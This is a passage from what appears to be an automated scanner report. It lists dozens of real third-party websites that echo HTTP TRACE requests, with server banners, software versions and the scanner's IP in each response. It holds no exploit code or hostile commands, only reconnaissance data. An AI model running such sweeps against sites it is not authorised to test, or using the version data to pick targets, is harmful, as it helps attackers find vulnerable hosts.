Host: www.hanestravelincomfort.com
Cookie: db98ba981976add


24.488. http://www.hankooki.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hankooki.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hankooki.com
Cookie: b82ad91eca215533

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:44 GMT
Server: Apache
Content-Type: message/http
Via: 1.1 Cache3 (Jaguar/3.0-11)
Connection: close

TRACE / HTTP/1.0
Host: www.hankooki.com
Cookie: b82ad91eca215533
X-Forwarded-For: 173.193.214.243
Via: 1.0 Cache3 (Jaguar/3.0-11)
Connection: Keep-Alive


24.489. http://www.hannahmontanagamesonline.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannahmontanagamesonline.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hannahmontanagamesonline.net
Cookie: bd334164b7ea64f0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hannahmontanagamesonline.net
Cookie: bd334164b7ea64f0


24.490. http://www.happyscooters.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.happyscooters.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.happyscooters.com
Cookie: 89f930ccc472fef4

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.happyscooters.com
Cookie: 89f930ccc472fef4


24.491. http://www.hardsubmission.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hardsubmission.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hardsubmission.com
Cookie: 354dc3f831fb561c

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:03 GMT
Server: Apache/2.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hardsubmission.com
Cookie: 354dc3f831fb561c


24.492. http://www.hcplc.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hcplc.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hcplc.org
Cookie: 20375d5858bda312

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:37 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hcplc.org
Cookie: 20375d5858bda312


24.493. http://www.hdmoviegalleries.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hdmoviegalleries.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hdmoviegalleries.net
Cookie: b673cd6b0e03452

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:49 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hdmoviegalleries.net
Cookie: b673cd6b0e03452


24.494. http://www.health.am/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.health.am
Path:   /

Request

TRACE / HTTP/1.0
Host: www.health.am
Cookie: 6bc8f561dda310d8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:03 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6bc8f561dda310d8
Host: www.health.am


24.495. http://www.healthwealthraffle.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthwealthraffle.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.healthwealthraffle.org
Cookie: 1dff836312f7b556

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:24 GMT
Server: Apache/2.2.17 (Unix) mod_auth_pgsql/2.0.3 PHP/5.2.17
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerBlackfund-80-Pool=2739052300.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.healthwealthraffle.org
Cookie: 1dff836312f7b556


24.496. http://www.heartofateachermovie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartofateachermovie.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.heartofateachermovie.com
Cookie: 54d5ec2f9068119c

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:29 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.heartofateachermovie.com
Cookie: 54d5ec2f9068119c


24.497. http://www.hemmy.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hemmy.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hemmy.net
Cookie: c2de96a7ffd5a3d6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:36 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c2de96a7ffd5a3d6
Host: www.hemmy.net


24.498. http://www.herzingonline.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herzingonline.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.herzingonline.edu
Cookie: b04755085eb480d8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.herzingonline.edu
Cookie: b04755085eb480d8


24.499. http://www.hikohoti.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hikohoti.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hikohoti.info
Cookie: c70706fcefd32426

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:30 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hikohoti.info
Cookie: c70706fcefd32426


24.500. http://www.hitcounters.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hitcounters.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hitcounters.net
Cookie: 62ecbb8d5828596d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hitcounters.net
Cookie: 62ecbb8d5828596d


24.501. http://www.hkheadline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hkheadline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hkheadline.com
Cookie: 87b6da4911ed3478

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 02:15:02 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 72

TRACE / HTTP/1.0
Host: www.hkheadline.com
Cookie: 87b6da4911ed3478


24.502. http://www.holder.com.ua/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holder.com.ua
Path:   /

Request

TRACE / HTTP/1.0
Host: www.holder.com.ua
Cookie: f262cd451e4cde11

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:18 GMT
Server: Apache/1.3.41 (Unix) mod_deflate/1.0.21
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f262cd451e4cde11
Host: www.holder.com.ua


24.503. http://www.hollywoodbowl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodbowl.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hollywoodbowl.com
Cookie: dcb67d86d76054a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:31 GMT
Server: Apache/2.2.13 (Win32) JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hollywoodbowl.com
Cookie: dcb67d86d76054a


24.504. http://www.homeadditionplus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeadditionplus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homeadditionplus.com
Cookie: a90887174567b300

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:13 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homeadditionplus.com
Cookie: a90887174567b300


24.505. http://www.homebasedbusinessmatchingservice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homebasedbusinessmatchingservice.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homebasedbusinessmatchingservice.com
Cookie: eb3459b8432cb151

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:02 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homebasedbusinessmatchingservice.com
Cookie: eb3459b8432cb151


24.506. http://www.homelink3.tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homelink3.tv
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homelink3.tv
Cookie: 8abbd33ef27a491b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 08:16:40 GMT
Server: Apache/2.2.17 (Win32) PHP/5.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homelink3.tv
Cookie: 8abbd33ef27a491b


24.507. http://www.homelite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homelite.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homelite.com
Cookie: 5f174fff6f1b4284

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:37:37 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homelite.com
Cookie: 5f174fff6f1b4284


24.508. http://www.homemakers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homemakers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homemakers.com
Cookie: 829c6404f013c8c3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:48 GMT
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homemakers.com
Cookie: 829c6404f013c8c3
Connection: Keep-Alive
X-Origin-IP: 173.193.214.243


24.509. http://www.homeoffersjob.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeoffersjob.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homeoffersjob.com
Cookie: 7c4bd8c25611d394

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homeoffersjob.com
Cookie: 7c4bd8c25611d394


24.510. http://www.homepage-baukasten.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homepage-baukasten.de
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homepage-baukasten.de
Cookie: 2de6163f95b6ec2e

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homepage-baukasten.de
Cookie: 2de6163f95b6ec2e


24.511. http://www.homeplaza.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeplaza.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homeplaza.com
Cookie: e6b1c78fe241899b

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homeplaza.com
Cookie: e6b1c78fe241899b


24.512. http://www.homeshopmachinist.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeshopmachinist.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homeshopmachinist.net
Cookie: 87bf7ee6cf29c607

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:46 GMT
Server: Apache/2.2.2 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homeshopmachinist.net
Cookie: 87bf7ee6cf29c607


24.513. http://www.homesincolorado.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homesincolorado.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homesincolorado.com
Cookie: 5bbdce9701d54c5b

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:18 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.3.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homesincolorado.com
Cookie: 5bbdce9701d54c5b


24.514. http://www.hometryst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hometryst.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hometryst.com
Cookie: 539a41d4de25bdb5

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:29 GMT
Server: Apache/2.2.9 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hometryst.com
Cookie: 539a41d4de25bdb5


24.515. http://www.homoboys.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homoboys.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homoboys.net
Cookie: 31ea082379c871ec

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 22:25:34 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 31ea082379c871ec
Host: www.homoboys.net


24.516. http://www.hondacivicforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hondacivicforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hondacivicforum.com
Cookie: 654c5d309a555e39

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerAFUWEB_www_pool=1106972844.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.hondacivicforum.com
Cookie: 654c5d309a555e39
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


24.517. http://www.horseadvice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.horseadvice.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.horseadvice.com
Cookie: e97837d89ef7e4bf

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:02 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.horseadvice.com
Cookie: e97837d89ef7e4bf


24.518. http://www.hosting-review.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hosting-review.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hosting-review.com
Cookie: 124f9c8ae520ee62

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hosting-review.com
Cookie: 124f9c8ae520ee62


24.519. http://www.hotboyscute.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotboyscute.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotboyscute.com
Cookie: 206776072eddbdf5

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hotboyscute.com
Cookie: 206776072eddbdf5


24.520. http://www.hotonlinenews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotonlinenews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotonlinenews.com
Cookie: f443426f7c364e66

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:03 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f443426f7c364e66
Host: www.hotonlinenews.com


24.521. http://www.hotrapevideos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotrapevideos.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotrapevideos.com
Cookie: 1874ef18d7d88e68

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:58 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hotrapevideos.com
Cookie: 1874ef18d7d88e68


24.522. http://www.hottlady.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hottlady.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hottlady.com
Cookie: 8ecbbfea313af6c0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:10 GMT
Server: Apache/2.2.16 (Unix) mod_ruby/1.3.0 Ruby/1.8.7(2009-12-24) PHP/5.2.13
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hottlady.com
Cookie: 8ecbbfea313af6c0


24.523. http://www.hotwifeclub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwifeclub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotwifeclub.com
Cookie: 1a3eb3c2d7884b22

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:37 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 1a3eb3c2d7884b22
Host: www.hotwifeclub.com


24.524. http://www.howdini.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howdini.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.howdini.com
Cookie: a22dc5dee2639e45

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.howdini.com
Cookie: a22dc5dee2639e45


24.525. http://www.howtobefit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtobefit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.howtobefit.com
Cookie: 3e685e33fbb04ed

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:43 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.howtobefit.com
Cookie: 3e685e33fbb04ed


24.526. http://www.howtoenjoyhummingbirds.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtoenjoyhummingbirds.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.howtoenjoyhummingbirds.com
Cookie: 59b0a40cc5ec4d61

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.howtoenjoyhummingbirds.com
Cookie: 59b0a40cc5ec4d61


24.527. http://www.howtoforge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtoforge.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.howtoforge.com
Cookie: 961bd725ba4dadd9

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:39:09 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from www.howtoforge.com
X-Cache-Lookup: NONE from www.howtoforge.com:80
Via: 1.1 www.howtoforge.com:80 (squid/2.7.STABLE3)
Connection: close

TRACE / HTTP/1.0
Host: www.howtoforge.com
Cookie: 961bd725ba4dadd9
Via: 1.0 www.howtoforge.com:80 (squid/2.7.STABLE3)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200
Connection: keep-alive


24.528. http://www.howtradestocksonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtradestocksonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.howtradestocksonline.com
Cookie: f95632f1a6398cf6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:59 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.howtradestocksonline.com
Cookie: f95632f1a6398cf6


24.529. http://www.hqasianpictures.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hqasianpictures.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hqasianpictures.com
Cookie: cbf9a9ca97d9aaa9

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:37 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: cbf9a9ca97d9aaa9
Host: www.hqasianpictures.com


24.530. http://www.hrmorning.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrmorning.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hrmorning.com
Cookie: a5a94c01f35bba95

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:06 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: Coyote-2-cc593cc2=d059172e:0; path=/

TRACE / HTTP/1.0
Host: www.hrmorning.com
Cookie: a5a94c01f35bba95


24.531. http://www.hubcaps.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hubcaps.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hubcaps.org
Cookie: ef8523bee18ab177

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:33 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/1.0.0c DAV/2 PHP/5.2.12 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hubcaps.org
Cookie: ef8523bee18ab177


24.532. http://www.hugo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hugo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hugo.com
Cookie: a3cb2d7f65b60524

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hugo.com
Cookie: a3cb2d7f65b60524


24.533. http://www.hypetrak.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hypetrak.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hypetrak.com
Cookie: ae33e9b60a0d918b

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:01:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hypetrak.com
Cookie: ae33e9b60a0d918b


24.534. http://www.i-learninghelp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.i-learninghelp.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.i-learninghelp.com
Cookie: 9bcb7f4b1d36f63d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:35 GMT
Server: Apache/2.2.16 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.i-learninghelp.com
Cookie: 9bcb7f4b1d36f63d


24.535. http://www.idealloansdirect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idealloansdirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.idealloansdirect.com
Cookie: 615ff67d485490dc

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:03 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 615ff67d485490dc
Host: www.idealloansdirect.com


24.536. http://www.ifindfile.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ifindfile.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ifindfile.com
Cookie: 19c3b207e28585cf

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:25:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ifindfile.com
Cookie: 19c3b207e28585cf


24.537. http://www.igirlsgames.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igirlsgames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.igirlsgames.com
Cookie: 1298751dc0fd29ac

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.igirlsgames.com
Cookie: 1298751dc0fd29ac


24.538. http://www.iieq.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iieq.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.iieq.com
Cookie: bed606aec93339be

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.iieq.com
Cookie: bed606aec93339be


24.539. http://www.imagefra.me/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imagefra.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imagefra.me
Cookie: a4fc1bbfd2dd3ad

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:03 GMT
Server: Apache/2.2.17 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imagefra.me
Cookie: a4fc1bbfd2dd3ad


24.540. http://www.imapp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imapp.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imapp.com
Cookie: ed2271330699a618

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imapp.com
Cookie: ed2271330699a618


24.541. http://www.impalas.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.impalas.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.impalas.com
Cookie: 1a6115eda6a15924

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:59:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.impalas.com
Cookie: 1a6115eda6a15924


24.542. http://www.imreportcard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imreportcard.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imreportcard.com
Cookie: 79312b639d5fd7a7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imreportcard.com
Cookie: 79312b639d5fd7a7


24.543. http://www.imyam.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imyam.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imyam.com
Cookie: 5a2fccc1f76e58db

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imyam.com
Cookie: 5a2fccc1f76e58db


24.544. http://www.in.ua/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.ua
Path:   /

Request

TRACE / HTTP/1.0
Host: www.in.ua
Cookie: 55b7cb54321c0ece

Response

HTTP/1.1 200 OK
